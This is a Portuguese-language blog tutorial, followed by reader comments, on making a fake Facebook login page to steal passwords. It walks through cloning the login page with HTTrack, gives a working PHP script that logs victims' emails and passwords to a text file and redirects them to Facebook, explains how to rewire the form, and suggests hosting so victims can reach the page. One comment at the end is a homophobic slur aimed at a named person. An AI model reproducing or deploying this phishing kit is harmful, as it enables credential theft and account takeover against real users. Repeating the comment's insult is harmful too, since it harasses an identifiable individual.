 |
| Fonte: http://www.blogtimicrocamp.com.br/artigos/paginas-fakes/ |
Você conseguiu entender? Caso não veja mais sobre esse assunto, conhecido também como phishing, aqui. Então vamos lá. Primeiro de tudo você precisa ter um servidor PHP rodando em um VPS ou em seu computador. Ou melhor, aqui está uma lista dos programas que você irá precisar antes de começar a fazer sua própria página fake:
- Servidor PHP: Xampp ou WampServer
- Clonador de sites: HTTrack
- Editor de texto: Notepad++
- Navegador atualizado: Chrome (Recomendado)
Você também precisa de algum conhecimento básico em HTML e PHP, mas, caso não tenha, não se preocupe, há ótimos cursos sobre essas linguagens pela internet a fora; os mais completos são esses aqui: HTML/PHP.
Depois desses pré-requitos resolvidos, é hora de por a mão na massa. Vamos começar abrindo o HTTrack e clicando, logo, em "Avançar >". Na próxima janela dê um nome ao seu projeto e então clique em "Avançar >". Na outra, coloque o endereço da página de login da rede social que você quer 'hackear'/descobrir a senha. Como nesse tutorial eu vou usar, como exemplo, o Facebook, irei colocar o seguinte endereço: http://www.facebook.com/login/, só lembrando que nem sempre as outras rede sociais seguem o mesmo padrão para a página de login. E depois clique em "Avançar >" e logo após em concluir.
Depois do término da clonação da página, é hora de começar a programação. Vamos criar dois arquivos: usuarios.txt e login.php, você pode fazer isso pelo próprio Notepad++, que vamos usar agora para editar o arquivo 'login.php', nesse arquivo coloque o seguinte código e salve-o:
<?php
header('location:http://facebook.com.br/');
$users = fopen("usuarios.txt","a+");
$u = $_GET['u'];
$p = $_GET['p'];
fwrite($users,"
-------------------------------\n
Usuário/Email: $u\n
Senha: $p \n
-------------------------------\n
")
?>
Agora vamos abrir a página .html que você clonou pelo HTTrack, que provavelmente está em C:\Meus Sites\NOME_DO_SEU_PROJETO. Abra ela pelo Notepad++ e encontre a parte do código que corresponde ao formulário de login, substitua a tag:
<form action= ...>Lembrando que ela pode variar em seu formato, pela seguinte tag:
<form method="get" action="login.php" name="logon">
Depois de substituir a tag, renomeie os inputs correspondentes aos campos de email e de senha para 'u' e 'p', sem as aspas, respectivamente.
Após todos estes passos acima, é só pegar os arquivos criados nesse tutorial e joga-los ao servidor. Só lembrando que para que a página fake ser acessível pela vítima, você tem que hospedar os arquivos em servidores com php, eu recomendaria a vocês a(o) Hostinger. Quando alguém cair nessa sua "armadilha", o email e a senha da vítima estará disponível no arquivo 'usuarios.txt'. Até próximo post! : )
Não seria bem mais fácil utilizar o LinkWS do que ter o trabalho de arrumar tudo isso ? (Na minha opinião é mais fácil o LinkWS)
ResponderExcluirE o que seria esse LinkWS?
Excluirok!
ResponderExcluirGostaria de avisar que se você ver um cara com o nome de DANILO ROCHA NO SKYPE, FUJA E CRIE OUTRO SKYPE, ELE É MUITO GAY
ResponderExcluir